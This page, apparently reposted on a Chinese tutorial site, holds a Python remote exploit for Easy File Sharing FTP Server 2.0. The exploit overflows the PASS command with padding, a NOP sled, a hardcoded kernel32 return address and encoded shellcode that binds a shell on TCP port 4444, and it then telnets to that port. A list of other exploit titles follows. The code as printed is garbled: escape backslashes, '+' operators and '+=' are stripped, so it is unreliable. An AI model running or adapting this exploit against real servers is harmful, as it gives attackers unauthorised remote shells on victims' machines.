手机
当前位置:查字典教程网 >网络安全 >Exploit >Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
摘要:#!/usr/bin/python#RemoteexploitforEasyFileSharingFTPserverV2.0.Thevuln...

#!/usr/bin/python

# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability

# was discovered by h07 and a POC for windows XP SP2 (polish version) was

# provided. This exploit was tested on windows 2000 server SP4. The exploit

# binds a shell on TCP port 4444.

#

# Author shall bear no responsibility for any screw ups

# Winny Thomas :-)

import os

import sys

import time

import struct

import socket

shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"

shellcode = "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"

shellcode = "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"

shellcode = "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"

shellcode = "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"

shellcode = "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"

shellcode = "x4ex56x46x42x46x42x4bx48x45x34x4ex33x4bx38x4ex37"

shellcode = "x45x50x4ax57x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"

shellcode = "x4fx45x42x32x41x30x4bx4ex49x34x4bx38x46x33x4bx38"

shellcode = "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"

shellcode = "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"

shellcode = "x46x4fx4bx43x46x35x46x32x4ax52x45x47x45x4ex4bx58"

shellcode = "x4fx45x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx34"

shellcode = "x4bx38x4fx45x4ex51x41x50x4bx4ex43x30x4ex42x4bx48"

shellcode = "x49x38x4ex46x46x52x4ex31x41x36x43x4cx41x43x4bx4d"

shellcode = "x46x36x4bx48x43x34x42x53x4bx48x42x44x4ex50x4bx58"

shellcode = "x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x55x4ax56"

shellcode = "x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"

shellcode = "x43x35x48x36x4ax36x43x43x44x43x4ax36x47x37x43x57"

shellcode = "x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"

shellcode = "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx45x49x48x45x4e"

shellcode = "x48x56x41x48x4dx4ex4ax30x44x30x45x55x4cx56x44x30"

shellcode = "x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x55"

shellcode = "x4fx4fx48x4dx43x45x43x45x43x45x43x35x43x35x43x44"

shellcode = "x43x55x43x44x43x35x4fx4fx42x4dx48x46x4ax56x41x31"

shellcode = "x4ex45x48x36x43x55x49x58x41x4ex45x39x4ax56x46x4a"

shellcode = "x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"

shellcode = "x41x35x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"

shellcode = "x49x4ex47x45x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d"

shellcode = "x4ax46x45x4ex49x44x48x58x49x54x47x45x4fx4fx48x4d"

shellcode = "x42x35x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax56"

shellcode = "x47x4ex49x37x48x4cx49x37x47x45x4fx4fx48x4dx45x55"

shellcode = "x4fx4fx42x4dx48x56x4cx46x46x46x48x46x4ax36x43x46"

shellcode = "x4dx46x49x58x45x4ex4cx46x42x35x49x35x49x32x4ex4c"

shellcode = "x49x38x47x4ex4cx36x46x34x49x38x44x4ex41x53x42x4c"

shellcode = "x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x44x4ex32"

shellcode = "x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"

shellcode = "x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"

shellcode = "x48x4dx4bx35x47x45x44x55x41x45x41x45x41x55x4cx36"

shellcode = "x41x30x41x35x41x45x45x45x41x45x4fx4fx42x4dx4ax46"

shellcode = "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx46"

shellcode = "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"

shellcode = "x43x58x46x4cx46x56x4fx4fx48x4dx44x45x4fx4fx42x4d"

shellcode = "x4ax56x4fx4ex50x4cx42x4ex42x36x43x55x4fx4fx48x4d"

shellcode = "x4fx4fx42x4dx5a"

def ConnectRemoteShell(target):

connect = "/usr/bin/telnet " target " 4444"

os.system(connect)

def ExploitFTP(target):

sockAddr = (target, 21)

tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

tsock.connect(sockAddr)

response = tsock.recv(1024)

print response

# At the time of overflow EBX points into our shellcode

payload = 'A' * 2553

# NOP's pad with a 15 byte jump over some junk and the RET address

# Jumps into our shellcode

payload = 'x90x90x90x90x90x90x90x90xebx0f'

# Address of 'call ebx' from kernel32.dll SP4

payload = struct.pack('<L', 0x7C577B03)

# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll

# But this one is not very reliable like Win2K SP4

#payload = struct.pack('<L', 0x71AB1269)

payload = 'x90' * 83

payload = shellcode

user = 'USER anonymousrn'

tsock.send(user)

response = tsock.recv(1024)

print response

passwd = 'PASS x2c' payload 'rn'

tsock.send(passwd)

response = tsock.recv(1024)

print response

if __name__ == '__main__':

try:

target = sys.argv[1]

except IndexError:

print 'Usage: %s <target>' % sys.argv[0]

sys.exit(-1)

ExploitFTP(target)//http://www.leftworld.net

【Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit】相关文章:

HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Debian Sarge Multiple IMAP Server Denial of Service Exploit

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

The Personal FTP Server 6.0f RETR Denial of Service Exploit

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

精品推荐
分类导航